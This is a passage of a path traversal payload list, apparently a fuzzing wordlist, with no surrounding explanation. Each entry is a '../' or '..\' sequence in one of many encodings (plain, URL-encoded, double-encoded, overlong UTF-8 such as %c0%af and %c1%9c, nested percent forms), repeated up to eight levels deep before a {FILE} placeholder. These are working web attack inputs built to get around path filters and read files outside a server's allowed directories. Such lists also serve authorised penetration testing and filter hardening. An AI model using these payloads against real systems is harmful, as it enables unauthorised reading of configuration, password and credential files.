..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af..%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/%25c0%25ae%25c0%25ae/{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af{FILE}&lt;br /&gt;
..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\%c0%ae%c0%ae\{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c{FILE}&lt;br /&gt;
..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c..%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c{FILE}&lt;br /&gt;
..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66{FILE}&lt;br /&gt;
..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
